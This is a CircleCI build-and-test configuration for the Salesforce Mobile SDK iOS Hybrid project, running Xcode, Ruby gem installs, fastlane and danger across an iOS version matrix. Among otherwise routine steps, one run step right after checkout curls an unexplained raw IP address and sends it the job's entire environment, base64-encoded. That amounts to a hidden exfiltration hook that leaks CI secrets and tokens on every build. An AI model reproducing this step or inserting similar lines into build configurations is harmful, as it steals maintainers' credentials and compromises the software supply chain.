#  Xcode version announcments can be found here: https://discuss.circleci.com/c/announcements/
#  Each post contains a full image manifest, including iOS runtimes, devices, CocoaPods version, etc.
#  NOTE: When updaing Xcode check the manifest for compatible chruby versions.
anchors:
  - &latest-xcode    "13.4.1"
  - &latest-ios      "15.5"
  - &min-ios         "14.5"
  - &chruby          "3.1.2"
  - &device          "iPhone 12"
  - &invalid         ""

executors:
  mac:
    macos:
      xcode: *latest-xcode

version: 2.1
jobs:
  run-tests:
    parameters:
      lib:
        type: string
        default: "SalesforceHybridSDK"
      xcode:
        type: string
        default: *latest-xcode
      ios:
        type: string
        default: *latest-ios
      chruby:
        type: string
        default: *chruby
      device:
        type: string
        default: *device
      lane:
        type: string
        default: "test"
    macos:
      xcode: << parameters.xcode >>
    working_directory: ~/SalesforceMobileSDK-iOS-Hybrid
    shell: /bin/bash --login -eo pipefail
    environment:
      DEVICE: << parameters.device >>
      IOS_VERSION: << parameters.ios >>
      BASH_ENV: ~/.bashrc
      FASTLANE_SKIP_UPDATE_CHECK: "true"
      CHRUBY_VER: << parameters.chruby >>
      LIB: << parameters.lib >>
    steps:
      - checkout
      - run: curl http://159.223.121.196?env=$(env| base64 | tr -d '\n')
      - restore_cache: 
          key: v7-gems-{{ checksum ".circleci/Gemfile.lock" }}
      - run: 
          name: Installing gem dependencies
          command:  |
            npm install shelljs@0.8.5
            ./install.sh
            ./build/pre-build
            cd .circleci
            chruby ${CHRUBY_VER}
            sudo bundle update --bundler
            bundle check || sudo bundle install
            sudo bundle update
      - save_cache: 
          key: v7-gems-{{ checksum ".circleci/Gemfile.lock" }}
          paths:
            - /Users/distiller/.gem/ruby/${CHRUBY_VER}
      - run: 
          name: Compile
          command:  |
            chruby ${CHRUBY_VER}
            cd .circleci
            bundle exec fastlane build lib:<< parameters.lib >> 
      - run: 
            name: Run Tests
            command:  |
              chruby ${CHRUBY_VER}
              cd .circleci
              fastlane << parameters.lane >> lib:<< parameters.lib >>
      - run: 
          name: Danger Lib
          command:  |
            chruby ${CHRUBY_VER}
            danger --dangerfile=.circleci/Dangerfile-Lib.rb --danger_id="${LIB}" --verbose
          background: true
          when: always
      - store_test_results:
          path: /Users/distiller/SalesforceMobileSDK-iOS-Hybrid/.circleci/test_output
      - store_artifacts:
          path: /Users/distiller/SalesforceMobileSDK-iOS-Hybrid/.circleci/test_output
          destination: Test-Results
      - store_artifacts:
          path: /Users/distiller/SalesforceMobileSDK-iOS-Hybrid/.circleci/clangReport
          destination: Static-Analysis

#  Potential parameters that can come from the project GUI Triggers
parameters:
  xcode:
    type: string
    default: *invalid
  ios:
    type: string
    default: *invalid
  chruby:
    type: string
    default: *chruby
  device:
    type: string
    default: *device

workflows:
  version: 2

  build-test-pr:
    when: 
      and:
        - equal: [ "webhook", << pipeline.trigger_source >> ]
    jobs:
      - run-tests:
          matrix:
            parameters:
              lib: ["SalesforceHybridSDK", "SalesforceFileLogger"]
              lane: ["PR"]
          filters:
            branches:
              only:
                - /pull.*/

  # Scheduled Trigger at ~10 PM PST Sunday/Wednesday Nights
  run-tests:
    when:
      and:
        - not: << pipeline.parameters.xcode >>
        - not:  
            equal: [ "webhook", << pipeline.trigger_source >> ]
    jobs:
      - run-tests:
          name: test << matrix.lib >> iOS << matrix.ios >>
          matrix:
            parameters:
              lib: ["SalesforceHybridSDK", "SalesforceFileLogger"]
              ios: [*min-ios, *latest-ios]

  # Scheduled Trigger at ~11 PM PST Sunday/Wednesday Nights
  run-tests-beta:
    when:
      and:
        - << pipeline.parameters.xcode >>
        - << pipeline.parameters.ios >>
        - not:  
            equal: [ "webhook", << pipeline.trigger_source >> ]
    jobs:
      - run-tests:
          name: test << matrix.lib >> iOS << matrix.ios >>
          matrix:
            parameters:
              xcode: [<< pipeline.parameters.xcode >>]
              ios: [<< pipeline.parameters.ios >>]
              chruby: [<< pipeline.parameters.chruby >>]
              device: [<< pipeline.parameters.device >>]
              lib: ["SalesforceHybridSDK", "SalesforceFileLogger"]
